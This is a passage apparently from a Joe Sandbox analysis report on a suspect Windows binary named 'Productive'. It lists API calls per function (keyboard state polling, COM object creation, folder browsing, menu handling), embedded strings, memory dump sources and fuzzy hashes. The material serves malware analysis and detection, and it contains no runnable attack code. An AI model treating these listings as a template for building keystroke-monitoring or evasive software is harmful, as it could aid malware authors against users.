                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0031DE60
                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0031DE83
                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0031DE8A
                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0031DEC1
                                                                                                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 0031DEC3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2762341140-0
                                                                                                                                                                • Opcode ID: d08613705fb9e876dedb42436c89b6e6bd950a5d15284cbe1cbf5255955ac07c
                                                                                                                                                                • Instruction ID: befe8752f4305c66707eeef3baa0b0b4ee56ace2c42742080c740e3c9a6790f2
                                                                                                                                                                • Opcode Fuzzy Hash: d08613705fb9e876dedb42436c89b6e6bd950a5d15284cbe1cbf5255955ac07c
                                                                                                                                                                • Instruction Fuzzy Hash: 99B1F975A10119AFDB09EFA4C889DAEBBB9FF49304F108459E905EB251DB30EE41CF90
                                                                                                                                                                APIs
                                                                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003077DD
                                                                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00307836
                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00307848
                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00307868
                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 003078BB
                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 003078CF
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 003078E4
                                                                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 003078F1
                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003078FA
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0030790C
                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00307917
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2706829360-0
                                                                                                                                                                • Opcode ID: 8c12430db57925fb9c506e347dbde2bf154370117947c63725076e5100ead846
                                                                                                                                                                • Instruction ID: 6bad9ada146a44c90f7478ed56c00e259fce4492cfe36ca8d05a90663c0b9841
                                                                                                                                                                • Opcode Fuzzy Hash: 8c12430db57925fb9c506e347dbde2bf154370117947c63725076e5100ead846
                                                                                                                                                                • Instruction Fuzzy Hash: 05416235E011199FCB05DFA9C8589EDBBB9FF08350F008469EA55AB361CB30BA55CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00310530
                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 003105B1
                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 003105CC
                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 003105E6
                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 003105FB
                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00310613
                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00310625
                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0031063D
                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0031064F
                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00310667
                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00310679
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                • Opcode ID: 072213c8b3fd4a187d7d1dcbe36b7cc9c40ff0e49ae9d4049cb2fcbe1e7d0a95
                                                                                                                                                                • Instruction ID: ceab78cce26c91e64de9e491c3444901e84b436060b7b064c1698fd1c08324c6
                                                                                                                                                                • Opcode Fuzzy Hash: 072213c8b3fd4a187d7d1dcbe36b7cc9c40ff0e49ae9d4049cb2fcbe1e7d0a95
                                                                                                                                                                • Instruction Fuzzy Hash: F841B8746087C96DFF3F866488043F5BEA1EB5B304F09409AD6C54A5C1EBE499D4CF92
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32 ref: 00328AED
                                                                                                                                                                • CoUninitialize.OLE32 ref: 00328AF8
                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00343BBC,?), ref: 00328B58
                                                                                                                                                                • IIDFromString.OLE32(?,?), ref: 00328BCB
                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00328C65
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00328CC6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                • API String ID: 636576611-1287834457
                                                                                                                                                                • Opcode ID: 78dce3d5f096d74c06e1ac2adbf4c0e2618078d4e87941895f520c20b5600b80
                                                                                                                                                                • Instruction ID: 9d00ddb52b5afb6425ce772db3a2ac04ca648ed8822994f6387a3b7cdc745e9a
                                                                                                                                                                • Opcode Fuzzy Hash: 78dce3d5f096d74c06e1ac2adbf4c0e2618078d4e87941895f520c20b5600b80
                                                                                                                                                                • Instruction Fuzzy Hash: 0C61C07020A7219FC712DF14E888FAAF7E8AF48754F00480DF9859B691CB70ED44CBA2
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0031E31F
                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0031E32F
                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0031E33B
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0031E3D8
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0031E3EC
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0031E41E
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0031E43F
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0031E48A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                • String ID: *.*
                                                                                                                                                                • API String ID: 1464919966-438819550
                                                                                                                                                                • Opcode ID: e6fc211f2a2241b7402e7c8935534f5724bfea65dee456714b03e59931a7edcc
                                                                                                                                                                • Instruction ID: 3a84ad692f55d01766515cb69a8d8b8245f60f85cdfbae329bde8477000307ef
                                                                                                                                                                • Opcode Fuzzy Hash: e6fc211f2a2241b7402e7c8935534f5724bfea65dee456714b03e59931a7edcc
                                                                                                                                                                • Instruction Fuzzy Hash: DE6177765142059FC715EF60C884AAEB3E8FF89310F048D1EF98987251DB36EA95CF92
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0031499C
                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003149C2
                                                                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00314A38
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                • API String ID: 2179348866-1459072770
                                                                                                                                                                • Opcode ID: bb9b80c9e5fec7efb959b92c220c9d4145e28e440146c95254b97ff6854facf0
                                                                                                                                                                • Instruction ID: 42120079fc8d4ad62c3568073bf30b61f0a0538820088a300494f0e421a93cde
                                                                                                                                                                • Opcode Fuzzy Hash: bb9b80c9e5fec7efb959b92c220c9d4145e28e440146c95254b97ff6854facf0
                                                                                                                                                                • Instruction Fuzzy Hash: 2D413772614204BAE716B7209C43EFFBBACDF45310F00441AF905A6292EB34EE619AA5
                                                                                                                                                                APIs
                                                                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0031A2C2
                                                                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0031A2E3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                • API String ID: 2948472770-3080491070
                                                                                                                                                                • Opcode ID: 7d735ba94e894728ec13e4436862d9ac9a6dd6a8cd1a4d5ec49b1b6895b74dfc
                                                                                                                                                                • Instruction ID: fecbdaf5633ff4c3674a4c304a29d1392878a9f8f20f244e343ae4727d07ac58
                                                                                                                                                                • Opcode Fuzzy Hash: 7d735ba94e894728ec13e4436862d9ac9a6dd6a8cd1a4d5ec49b1b6895b74dfc
                                                                                                                                                                • Instruction Fuzzy Hash: DD51C231900119AACF1AEBE0CD46EEEB778AF09340F100269F505B2153DB316FA9DF91
                                                                                                                                                                APIs
                                                                                                                                                                • CreateMenu.USER32 ref: 003377AA
                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 003377B9
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00337846
                                                                                                                                                                • IsMenu.USER32(?), ref: 0033785C
                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00337866
                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00337893
                                                                                                                                                                • DrawMenuBar.USER32 ref: 0033789B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                • String ID: 0$F
                                                                                                                                                                • API String ID: 161812096-3044882817
                                                                                                                                                                • Opcode ID: d490ef2529e4e569df4a4240425820fff0599489d5733d3e10eb1bba645618a6
                                                                                                                                                                • Instruction ID: a229c3bf14ced7874fd4ccd1e4d29d72c65ea63f57c1d5cd71803dfce4abbbef
                                                                                                                                                                • Opcode Fuzzy Hash: d490ef2529e4e569df4a4240425820fff0599489d5733d3e10eb1bba645618a6
                                                                                                                                                                • Instruction Fuzzy Hash: F6415CB8A14209EFDB21DF64D889A9A7BF9FF49310F154069FA45AB360D730A910DF50
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0031BB13
                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0031BB89
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0031BB93
                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0031BC00
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                                                                • Opcode ID: ff0758fef10cc468b4c4dee1c3ae15b8bf54ff8e1f7100a0028a34823e799c56
                                                                                                                                                                • Instruction ID: 3359c8965d692384b2a41f136a0425f5efc9b9caad7a355d07474dc4e1dc27df
                                                                                                                                                                • Opcode Fuzzy Hash: ff0758fef10cc468b4c4dee1c3ae15b8bf54ff8e1f7100a0028a34823e799c56
                                                                                                                                                                • Instruction Fuzzy Hash: B331D435A042099FCB1AEF64C885EEDF7B8EF49340F14C119E505D7696DB70A981CB90
                                                                                                                                                                APIs
                                                                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 0031357C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: IconLoad
                                                                                                                                                                • String ID: ,z70z7$,z70z7$blank$info$question$stop$warning
                                                                                                                                                                • API String ID: 2457776203-1991408718
                                                                                                                                                                • Opcode ID: 933ee5487510f7bbadfca89692e24833d83160f147aba1375bbebe5f313df7fc
                                                                                                                                                                • Instruction ID: 68c2b33562caa27876eb386d27970d03cdaa61b64bd455a8f29d067f5932daf1
                                                                                                                                                                • Opcode Fuzzy Hash: 933ee5487510f7bbadfca89692e24833d83160f147aba1375bbebe5f313df7fc
                                                                                                                                                                • Instruction Fuzzy Hash: 4E11EB75649347BEE70B9B14DC93CEA779DDF0BB64B10401AFA0496281E774AFC04DA1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0030B7BD
                                                                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00309BCC
                                                                                                                                                                • GetDlgCtrlID.USER32 ref: 00309BD7
                                                                                                                                                                • GetParent.USER32 ref: 00309BF3
                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00309BF6
                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00309BFF
                                                                                                                                                                • GetParent.USER32(?), ref: 00309C1B
                                                                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00309C1E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                • API String ID: 2573188126-1403004172
                                                                                                                                                                • Opcode ID: 16742598c0b025728dfda743b49ac66cc0f065c316dc9d522a23ceb562d94070
                                                                                                                                                                • Instruction ID: d1751459bdb9eddfbeccb403df86b47abf894f118f8edcdef6ff5f247a9f8d16
                                                                                                                                                                • Opcode Fuzzy Hash: 16742598c0b025728dfda743b49ac66cc0f065c316dc9d522a23ceb562d94070
                                                                                                                                                                • Instruction Fuzzy Hash: A121F775A01104ABDF05EB60CC95EFEBBB8EF96310F000116F961972E2DB745925DA20
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0030B7BD
                                                                                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00309CB5
                                                                                                                                                                • GetDlgCtrlID.USER32 ref: 00309CC0
                                                                                                                                                                • GetParent.USER32 ref: 00309CDC
                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00309CDF
                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00309CE8
                                                                                                                                                                • GetParent.USER32(?), ref: 00309D04
                                                                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00309D07
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                • API String ID: 2573188126-1403004172
                                                                                                                                                                • Opcode ID: 1f0f43b912b2d6afae89d4a3fa11e462ed6e6a05b5f433368b58e65005e656e0
                                                                                                                                                                • Instruction ID: a0dab81f28358131470d083c8bf570b2a01afd6282cef6c5e0d11c2c41346602
                                                                                                                                                                • Opcode Fuzzy Hash: 1f0f43b912b2d6afae89d4a3fa11e462ed6e6a05b5f433368b58e65005e656e0
                                                                                                                                                                • Instruction Fuzzy Hash: E021F475A421047BDF06EB64CC95FFEBBB8EF46300F100106FA51971A2DB399925DA20
                                                                                                                                                                APIs
                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00328FC1
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00328FEE
                                                                                                                                                                • CoUninitialize.OLE32 ref: 00328FF8
                                                                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 003290F8
                                                                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00329225
                                                                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00343BDC), ref: 00329259
                                                                                                                                                                • CoGetObject.OLE32(?,00000000,00343BDC,?), ref: 0032927C
                                                                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 0032928F
                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0032930F
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0032931F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2395222682-0
                                                                                                                                                                • Opcode ID: 0f079a55678e28f0002a60fc1f42a28c447a5ef313ab6d9ba0bee1fdf6c0f4a7
                                                                                                                                                                • Instruction ID: 600232b29e2aec22f88caa59d4e2c32966427eb29659449bad0e48dfc5b81a49
                                                                                                                                                                • Opcode Fuzzy Hash: 0f079a55678e28f0002a60fc1f42a28c447a5ef313ab6d9ba0bee1fdf6c0f4a7
                                                                                                                                                                • Instruction Fuzzy Hash: 87C15771208319AFC705DF64D884A6BB7E9FF89748F00491DF98A9B251DB31ED05CB92
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenuItemInfoW.USER32(00377890,000000FF,00000000,00000030), ref: 00312D4A
                                                                                                                                                                • SetMenuItemInfoW.USER32(00377890,00000004,00000000,00000030), ref: 00312D80
